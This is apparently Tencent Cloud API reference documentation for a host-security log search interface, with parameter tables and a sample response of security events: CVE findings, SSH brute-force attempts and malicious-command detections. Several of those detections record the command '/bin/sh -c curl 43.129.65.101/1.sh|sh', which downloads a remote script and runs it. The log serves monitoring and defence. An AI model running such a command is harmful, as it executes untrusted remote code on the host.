1. 接口描述
接口请求域名: cwp.tencentcloudapi.com 。
查询日志
默认接口请求频率限制:20次/秒。
推荐使用 API Explorer
点击调试
API Explorer 提供了在线调用、签名验证、SDK 代码生成和快速检索接口等能力。您可查看每次调用的请求内容和返回结果以及自动生成 SDK 调用示例。
2. 输入参数
以下请求参数列表仅列出了接口请求参数和部分公共参数,完整公共参数列表见 公共请求参数。
| 参数名称 | 必选 | 类型 | 描述 |
|---|---|---|---|
| Action | 是 | String | 公共参数,本接口取值:SearchLog。 |
| Version | 是 | String | 公共参数,本接口取值:2018-02-28。 |
| Region | 否 | String | 公共参数,此参数为可选参数。 |
| StartTime | 是 | Integer | 要检索分析的日志的起始时间,Unix时间戳(毫秒) 示例值:1656641065449 |
| EndTime | 是 | Integer | 要检索分析的日志的结束时间,Unix时间戳(毫秒) 示例值:1656641965449 |
| QueryString | 是 | String | 检索分析语句,最大长度为12KB 示例值:status: "异常登录" AND public_ip_addresses: (1* OR 2* OR 3* OR 4* OR 5* OR 6* OR 7* OR 8* OR 9) AND NOT hostip: (10.128.200. OR 10.129.24.212) AND NOT src_ip: (10.128.128.7 OR 192.144.182.173) AND NOT username: **** |
| Count | 否 | Integer | 表示单次查询返回的原始日志条数,最大值为1000,获取后续日志需使用Context参数 示例值:20 |
| Sort | 否 | String | 原始日志是否按时间排序返回;可选值:asc(升序)、desc(降序),默认为 desc 示例值:desc |
| Context | 否 | String | 透传上次接口返回的Context值,可获取后续更多日志,总计最多可获取1万条原始日志,过期时间1小时 示例值:search |
3. 输出参数
| 参数名称 | 类型 | 描述 |
|---|---|---|
| Count | Integer | 匹配检索条件的原始日志的数量 示例值:17 |
| Context | String | 透传本次接口返回的Context值,可获取后续更多日志,过期时间1小时 示例值:content |
| ListOver | Boolean | 符合检索条件的日志是否已全部返回,如未全部返回可使用Context参数获取后续更多日志 示例值:false |
| Analysis | Boolean | 返回的是否为统计分析(即SQL)结果 示例值:false |
| Data | Array of LogInfo | 匹配检索条件的原始日志 示例值:{ "Content": "{"create_time":"2022-07-01 10:00:27 +0800 CST","hostip":"10.0.0.6","level":"中危","modify_time":"2022-07-01 10:17:05 +0800 CST","remark":"","uuid":"13bb1e16-9a7a-434d-9686-4328f72c97d7","is_emergency":"False","reference":"https://www.phpmyadmin.net/security/PMASA-2016-20/\",\"path\":\"/var/www/html/phpmyadmin\",\"fix\":\"1、建议升级到官方最新版本,官网地址:https://www.phpmyadmin.net\",\"cve_id\":\"CVE-2016-5704\",\"cls_event_type\":\"Web-CMS_vul\",\"appid\":\"1256299843\",\"name\":\"phpMyAdmin 4.6.x 表结构页面存在XSS漏洞","id":"771","vul_category":"Web-CMS漏洞","descript":"漏洞文件路径: /var/www/html/phpmyadmin/templates/table/structure/display_table_stats.phtml","event_status":"modify","status":"待处理"}", "FileName": "filename", "Source": "30.46.128.22", "TimeStamp": 1656641946000 } |
| RequestId | String | 唯一请求 ID,由服务端生成,每次请求都会返回(若请求因其他原因未能抵达服务端,则该次请求不会获得 RequestId)。定位问题时需要提供该次请求的 RequestId。 |
4. 示例
示例1 示例
输入示例
POST / HTTP/1.1
Host: cwp.tencentcloudapi.com
Content-Type: application/json
X-TC-Action: SearchLog
<公共请求参数>
{
"Sort": "desc",
"Count": "20",
"QueryString": "status: \"异常登录\" AND public_ip_addresses: (1* OR 2* OR 3* OR 4* OR 5* OR 6* OR 7* OR 8* OR 9*) AND NOT hostip: (10.128.200.* OR 10.129.24.212) AND NOT src_ip: (10.128.128.7 OR 192.144.182.173) AND NOT username: ****",
"StartTime": "1656641065449",
"EndTime": "1656641965449"
}输出示例
{
"Response": {
"Analysis": false,
"Context": "content",
"Count": 17,
"Data": [
{
"Content": "{\"create_time\":\"2022-07-01 10:00:27 +0800 CST\",\"hostip\":\"10.0.0.6\",\"level\":\"中危\",\"modify_time\":\"2022-07-01 10:17:05 +0800 CST\",\"remark\":\"\",\"uuid\":\"13bb1e16-9a7a-434d-9686-4328f72c97d7\",\"is_emergency\":\"False\",\"reference\":\"https://www.phpmyadmin.net/security/PMASA-2016-20/\",\"path\":\"/var/www/html/phpmyadmin\",\"fix\":\"1、建议升级到官方最新版本,官网地址:https://www.phpmyadmin.net\",\"cve_id\":\"CVE-2016-5704\",\"cls_event_type\":\"Web-CMS_vul\",\"appid\":\"1256299843\",\"name\":\"phpMyAdmin 4.6.x 表结构页面存在XSS漏洞\",\"id\":\"771\",\"vul_category\":\"Web-CMS漏洞\",\"descript\":\"漏洞文件路径: /var/www/html/phpmyadmin/templates/table/structure/display_table_stats.phtml\",\"event_status\":\"modify\",\"status\":\"待处理\"}",
"FileName": "file***",
"Source": "30.46.128.22",
"TimeStamp": 1656641946000
},
{
"Content": "{\"create_time\":\"2022-07-01 10:00:27 +0800 CST\",\"hostip\":\"10.0.0.6\",\"level\":\"高危\",\"modify_time\":\"2022-07-01 10:17:05 +0800 CST\",\"remark\":\"\",\"uuid\":\"13bb1e16-9a7a-434d-9686-4328f72c97d7\",\"is_emergency\":\"False\",\"reference\":\"https://httpd.apache.org/security/vulnerabilities_24.html\",\"path\":\"\",\"fix\":\"升级至2.4.6-90及以上版本或 2.4.39及以上版本\",\"cve_id\":\"CVE-2019-0217\",\"cls_event_type\":\"application_vul\",\"appid\":\"1256299843\",\"name\":\"Apache HTTP Server mod_auth_digest 条件竞争漏洞\",\"id\":\"767\",\"vul_category\":\"应用漏洞\",\"descript\":\"Apache HTTP Server 启用了 mod_auth_digest 模块,且Apache HTTP Server 版本为:2.4.37-47.module_el8.6.0+1111+ce6f4ceb.1。\",\"event_status\":\"modify\",\"status\":\"待处理\"}",
"FileName": "file***",
"Source": "30.46.128.22",
"TimeStamp": 1656641946000
},
{
"Content": "{\"create_time\":\"2022-07-01 10:00:27 +0800 CST\",\"hostip\":\"10.0.0.6\",\"level\":\"中危\",\"modify_time\":\"2022-07-01 10:17:05 +0800 CST\",\"remark\":\"\",\"uuid\":\"13bb1e16-9a7a-434d-9686-4328f72c97d7\",\"is_emergency\":\"True\",\"reference\":\"https://www.phpmyadmin.net/security/PMASA-2016-19/\",\"path\":\"/var/www/html/phpmyadmin\",\"fix\":\"1、建议升级到官方最新版本,官网地址:https://www.phpmyadmin.net\",\"cve_id\":\"CVE-2016-5703\",\"cls_event_type\":\"emergency_vul\",\"appid\":\"1256299843\",\"name\":\"phpMyAdmin central_columns.lib.php SQL注入漏洞\",\"id\":\"772\",\"vul_category\":\"Web-CMS漏洞\",\"descript\":\"漏洞文件路径: /var/www/html/phpmyadmin/libraries/central_columns.lib.php\",\"event_status\":\"modify\",\"status\":\"待处理\"}",
"FileName": "file***",
"Source": "30.46.128.22",
"TimeStamp": 1656641946000
},
{
"Content": "{\"create_time\":\"2022-07-01 10:00:27 +0800 CST\",\"hostip\":\"10.0.0.6\",\"level\":\"高危\",\"modify_time\":\"2022-07-01 10:17:05 +0800 CST\",\"remark\":\"\",\"uuid\":\"13bb1e16-9a7a-434d-9686-4328f72c97d7\",\"is_emergency\":\"False\",\"reference\":\"https://www.seebug.org/vuldb/ssvid-92512\",\"path\":\"/var/www/html/phpmyadmin\",\"fix\":\"1、升级到最新版本,官网地址:https://www.phpmyadmin.net\",\"cve_id\":\"CVE-2016-6633\",\"cls_event_type\":\"Web-CMS_vul\",\"appid\":\"1256299843\",\"name\":\"phpMyAdmin dbase extension 远程代码执行漏洞\",\"id\":\"764\",\"vul_category\":\"Web-CMS漏洞\",\"descript\":\"漏洞文件路径: /var/www/html/phpmyadmin/libraries/zip_extension.lib.php\",\"event_status\":\"modify\",\"status\":\"待处理\"}",
"FileName": "file***",
"Source": "30.46.128.22",
"TimeStamp": 1656641946000
},
{
"Content": "{\"create_time\":\"2022-07-01 10:00:27 +0800 CST\",\"hostip\":\"10.0.0.6\",\"level\":\"中危\",\"modify_time\":\"2022-07-01 10:17:05 +0800 CST\",\"remark\":\"\",\"uuid\":\"13bb1e16-9a7a-434d-9686-4328f72c97d7\",\"is_emergency\":\"False\",\"reference\":\"https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2020-9490\",\"path\":\"\",\"fix\":\"升级 Apache HTTP Server到 2.4.46 版本\",\"cve_id\":\"CVE-2020-9490\",\"cls_event_type\":\"application_vul\",\"appid\":\"1256299843\",\"name\":\"Apache HTTP Server http2_module 拒绝服务漏洞\",\"id\":\"769\",\"vul_category\":\"应用漏洞\",\"descript\":\"Apache HTTP Server 启用了 mod_http2 模块,且Apache HTTP Server版本为:2.4.37-47.module_el8.6.0+1111+ce6f4ceb.1。\",\"event_status\":\"modify\",\"status\":\"待处理\"}",
"FileName": "file***",
"Source": "30.46.128.22",
"TimeStamp": 1656641946000
},
{
"Content": "{\"create_time\":\"2022-07-01 10:00:27 +0800 CST\",\"hostip\":\"10.0.0.6\",\"level\":\"高危\",\"modify_time\":\"2022-07-01 10:17:05 +0800 CST\",\"remark\":\"\",\"uuid\":\"13bb1e16-9a7a-434d-9686-4328f72c97d7\",\"is_emergency\":\"True\",\"reference\":\"https://www.seebug.org/vuldb/ssvid-92209\",\"path\":\"/var/www/html/phpmyadmin\",\"fix\":\"1、建议升级至官方最新版本并且避免使用弱密码;\",\"cve_id\":\"CVE-2016-5734\",\"cls_event_type\":\"emergency_vul\",\"appid\":\"1256299843\",\"name\":\"phpMyAdmin授权用户远程命令执行漏洞\",\"id\":\"768\",\"vul_category\":\"Web-CMS漏洞\",\"descript\":\"漏洞文件路径: /var/www/html/phpmyadmin/libraries/controllers/table/TableSearchController.php\",\"event_status\":\"modify\",\"status\":\"待处理\"}",
"FileName": "file***",
"Source": "30.46.128.22",
"TimeStamp": 1656641946000
},
{
"Content": "{\"create_time\":\"2022-07-01 10:00:27 +0800 CST\",\"hostip\":\"10.0.0.6\",\"level\":\"高危\",\"modify_time\":\"2022-07-01 10:17:05 +0800 CST\",\"remark\":\"\",\"uuid\":\"13bb1e16-9a7a-434d-9686-4328f72c97d7\",\"is_emergency\":\"False\",\"reference\":\"https://www.phpmyadmin.net/security/PMASA-2016-40/\",\"path\":\"/var/www/html/phpmyadmin\",\"fix\":\"1、建议升级到官方最新版本,官网地址:https://www.phpmyadmin.net\",\"cve_id\":\"CVE-2016-6617\",\"cls_event_type\":\"Web-CMS_vul\",\"appid\":\"1256299843\",\"name\":\"phpMyAdmin 4.6.x 导出功能SQL注入漏洞\",\"id\":\"765\",\"vul_category\":\"Web-CMS漏洞\",\"descript\":\"漏洞文件路径: /var/www/html/phpmyadmin/libraries/display_export.lib.php\",\"event_status\":\"modify\",\"status\":\"待处理\"}",
"FileName": "file***",
"Source": "30.46.128.22",
"TimeStamp": 1656641946000
},
{
"Content": "{\"create_time\":\"2022-07-01 10:00:27 +0800 CST\",\"hostip\":\"10.0.0.6\",\"level\":\"高危\",\"modify_time\":\"2022-07-01 10:17:05 +0800 CST\",\"remark\":\"\",\"uuid\":\"13bb1e16-9a7a-434d-9686-4328f72c97d7\",\"is_emergency\":\"False\",\"reference\":\"https://www.phpmyadmin.net/security/PMASA-2016-25/\",\"path\":\"/var/www/html/phpmyadmin\",\"fix\":\"1、建议升级到官方最新版本,官网地址:https://www.phpmyadmin.net\",\"cve_id\":\"CVE-2016-5732\",\"cls_event_type\":\"Web-CMS_vul\",\"appid\":\"1256299843\",\"name\":\"phpMyAdmin 4.6.x XSS漏洞\",\"id\":\"770\",\"vul_category\":\"Web-CMS漏洞\",\"descript\":\"漏洞文件路径: /var/www/html/phpmyadmin/templates/table/structure/display_partitions.phtml\",\"event_status\":\"modify\",\"status\":\"待处理\"}",
"FileName": "file***",
"Source": "30.46.128.22",
"TimeStamp": 1656641946000
},
{
"Content": "{\"create_time\":\"2022-07-01 10:00:27 +0800 CST\",\"hostip\":\"10.0.0.6\",\"level\":\"中危\",\"modify_time\":\"2022-07-01 10:17:05 +0800 CST\",\"remark\":\"\",\"uuid\":\"13bb1e16-9a7a-434d-9686-4328f72c97d7\",\"is_emergency\":\"False\",\"reference\":\"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11984\",\"path\":\"\",\"fix\":\"升级至2.4.44及以上版本\",\"cve_id\":\"CVE-2020-11984\",\"cls_event_type\":\"application_vul\",\"appid\":\"1256299843\",\"name\":\"Apache HTTP Server mod_proxy_uwsgi 缓冲区溢出漏洞\",\"id\":\"766\",\"vul_category\":\"应用漏洞\",\"descript\":\"Apache HTTP Server 启用了 mod_proxy_uwsgi 模块,且版本为:2.4.37-47.module_el8.6.0+1111+ce6f4ceb.1。\",\"event_status\":\"modify\",\"status\":\"待处理\"}",
"FileName": "file***",
"Source": "30.46.128.22",
"TimeStamp": 1656641946000
},
{
"Content": "{\"create_time\":\"2022-06-30 11:01:55 +0800 CST\",\"hostip\":\"172.16.48.133\",\"modify_time\":\"2022-07-01 10:15:23 +0800 CST\",\"count\":\"3380\",\"uuid\":\"e1f081aa-7777-4fdf-a2f7-88f3faa3d302\",\"src_ip\":\"82.157.124.14\",\"src_machine_name\":\"ssh\",\"event_type\":\"暴破失败\",\"appid\":\"1256299843\",\"cls_event_type\":\"bruteattack\",\"dst_port\":\"22\",\"location\":\"北京-北京市\",\"banned\":\"未阻断(非专业版、非旗舰版)\",\"id\":\"202226000001705\",\"event_status\":\"modify\",\"status\":\"待处理\",\"username\":\"root\"}",
"FileName": "file***",
"Source": "30.46.128.22",
"TimeStamp": 1656641844000
},
{
"Content": "{\"create_time\":\"2022-06-30 11:01:55 +0800 CST\",\"hostip\":\"172.16.48.133\",\"modify_time\":\"2022-07-01 10:15:23 +0800 CST\",\"count\":\"3380\",\"uuid\":\"e1f081aa-7777-4fdf-a2f7-88f3faa3d302\",\"src_ip\":\"82.157.124.14\",\"src_machine_name\":\"ssh\",\"event_type\":\"暴破失败\",\"appid\":\"1256299843\",\"cls_event_type\":\"bruteattack\",\"dst_port\":\"22\",\"location\":\"北京-北京市\",\"banned\":\"未阻断(非专业版、非旗舰版)\",\"id\":\"202226000001705\",\"event_status\":\"modify\",\"status\":\"待处理\",\"username\":\"root\"}",
"FileName": "file***",
"Source": "30.46.128.22",
"TimeStamp": 1656641824000
},
{
"Content": "{\"create_time\":\"2022-07-01 10:10:03 +0800 CST\",\"hostip\":\"172.16.0.49\",\"rule_name\":\"1003.恶意命令-下载&执行未知程序\",\"modify_time\":\"0001-01-01 00:00:00 +0000 UTC\",\"rule_level\":\"高危\",\"uuid\":\"7168bc08-c1b8-11ea-9053-48fd8e5f474c\",\"platform\":\"Linux64\",\"appid\":\"1256299843\",\"cls_event_type\":\"bash\",\"exec_time\":\"2022-07-01 10:10:01 +0800 CST\",\"id\":\"3141559\",\"bash_cmd\":\"/bin/sh -c curl 43.129.65.101/1.sh|sh\",\"user\":\"0:0\",\"event_status\":\"create\",\"status\":\"待处理\"}",
"FileName": "file***",
"Source": "30.46.128.22",
"TimeStamp": 1656641520000
},
{
"Content": "{\"create_time\":\"2022-07-01 07:44:58 +0800 CST\",\"hostip\":\"172.16.48.79\",\"modify_time\":\"2022-07-01 10:09:23 +0800 CST\",\"count\":\"349\",\"uuid\":\"93137e79-ae2e-4677-95ac-23a5024607b1\",\"src_ip\":\"110.40.168.164\",\"src_machine_name\":\"ssh\",\"event_type\":\"暴破失败\",\"appid\":\"1256299843\",\"cls_event_type\":\"bruteattack\",\"dst_port\":\"22\",\"location\":\"上海-上海市\",\"banned\":\"未阻断(非专业版、非旗舰版)\",\"id\":\"202226000001999\",\"event_status\":\"modify\",\"status\":\"待处理\",\"username\":\"root\"}",
"FileName": "file***",
"Source": "30.46.128.22",
"TimeStamp": 1656641484000
},
{
"Content": "{\"create_time\":\"2022-07-01 07:44:58 +0800 CST\",\"hostip\":\"172.16.48.79\",\"modify_time\":\"2022-07-01 10:09:23 +0800 CST\",\"count\":\"349\",\"uuid\":\"93137e79-ae2e-4677-95ac-23a5024607b1\",\"src_ip\":\"110.40.168.164\",\"src_machine_name\":\"ssh\",\"event_type\":\"暴破失败\",\"appid\":\"1256299843\",\"cls_event_type\":\"bruteattack\",\"dst_port\":\"22\",\"location\":\"上海-上海市\",\"banned\":\"未阻断(非专业版、非旗舰版)\",\"id\":\"202226000001999\",\"event_status\":\"modify\",\"status\":\"待处理\",\"username\":\"root\"}",
"FileName": "file***",
"Source": "30.46.128.22",
"TimeStamp": 1656641464000
},
{
"Content": "{\"create_time\":\"2022-07-01 10:07:04 +0800 CST\",\"hostip\":\"172.16.0.49\",\"rule_name\":\"1003.恶意命令-下载&执行未知程序\",\"modify_time\":\"0001-01-01 00:00:00 +0000 UTC\",\"rule_level\":\"高危\",\"uuid\":\"7168bc08-c1b8-11ea-9053-48fd8e5f474c\",\"platform\":\"Linux64\",\"appid\":\"1256299843\",\"cls_event_type\":\"bash\",\"exec_time\":\"2022-07-01 10:07:01 +0800 CST\",\"id\":\"3141558\",\"bash_cmd\":\"/bin/sh -c curl 43.129.65.101/1.sh|sh\",\"user\":\"0:0\",\"event_status\":\"create\",\"status\":\"待处理\"}",
"FileName": "file***",
"Source": "30.46.128.22",
"TimeStamp": 1656641280000
},
{
"Content": "{\"create_time\":\"2022-07-01 10:05:04 +0800 CST\",\"hostip\":\"172.16.0.49\",\"rule_name\":\"1003.恶意命令-下载&执行未知程序\",\"modify_time\":\"0001-01-01 00:00:00 +0000 UTC\",\"rule_level\":\"高危\",\"uuid\":\"7168bc08-c1b8-11ea-9053-48fd8e5f474c\",\"platform\":\"Linux64\",\"appid\":\"1256299843\",\"cls_event_type\":\"bash\",\"exec_time\":\"2022-07-01 10:05:01 +0800 CST\",\"id\":\"3141557\",\"bash_cmd\":\"/bin/sh -c curl 43.129.65.101/1.sh|sh\",\"user\":\"0:0\",\"event_status\":\"create\",\"status\":\"待处理\"}",
"FileName": "file***",
"Source": "30.46.128.22",
"TimeStamp": 1656641160000
},
{
"Content": "{\"create_time\":\"2022-07-01 10:04:05 +0800 CST\",\"hostip\":\"172.16.0.49\",\"rule_name\":\"1003.恶意命令-下载&执行未知程序\",\"modify_time\":\"0001-01-01 00:00:00 +0000 UTC\",\"rule_level\":\"高危\",\"uuid\":\"7168bc08-c1b8-11ea-9053-48fd8e5f474c\",\"platform\":\"Linux64\",\"appid\":\"1256299843\",\"cls_event_type\":\"bash\",\"exec_time\":\"2022-07-01 10:04:01 +0800 CST\",\"id\":\"3141556\",\"bash_cmd\":\"/bin/sh -c curl 43.129.65.101/1.sh|sh\",\"user\":\"0:0\",\"event_status\":\"create\",\"status\":\"待处理\"}",
"FileName": "file***",
"Source": "30.46.128.22",
"TimeStamp": 1656641160000
}
],
"ListOver": true,
"RequestId": "e6bb2f6d-10b3-40fd-b3a4-630dbdf477c3"
}
}5. 开发者资源
腾讯云 API 平台
腾讯云 API 平台 是综合 API 文档、错误码、API Explorer 及 SDK 等资源的统一查询平台,方便您从同一入口查询及使用腾讯云提供的所有 API 服务。
API Inspector
用户可通过 API Inspector 查看控制台每一步操作关联的 API 调用情况,并自动生成各语言版本的 API 代码,也可前往 API Explorer 进行在线调试。
SDK
云 API 3.0 提供了配套的开发工具集(SDK),支持多种编程语言,能更方便的调用 API。
- Tencent Cloud SDK 3.0 for Python: GitHub Gitee
- Tencent Cloud SDK 3.0 for Java: GitHub Gitee
- Tencent Cloud SDK 3.0 for PHP: GitHub Gitee
- Tencent Cloud SDK 3.0 for Go: GitHub Gitee
- Tencent Cloud SDK 3.0 for Node.js: GitHub Gitee
- Tencent Cloud SDK 3.0 for .NET: GitHub Gitee
- Tencent Cloud SDK 3.0 for C++: GitHub Gitee
- Tencent Cloud SDK 3.0 for Ruby: GitHub Gitee
命令行工具
6. 错误码
该接口暂无业务逻辑相关的错误码,其他错误码详见 公共错误码。
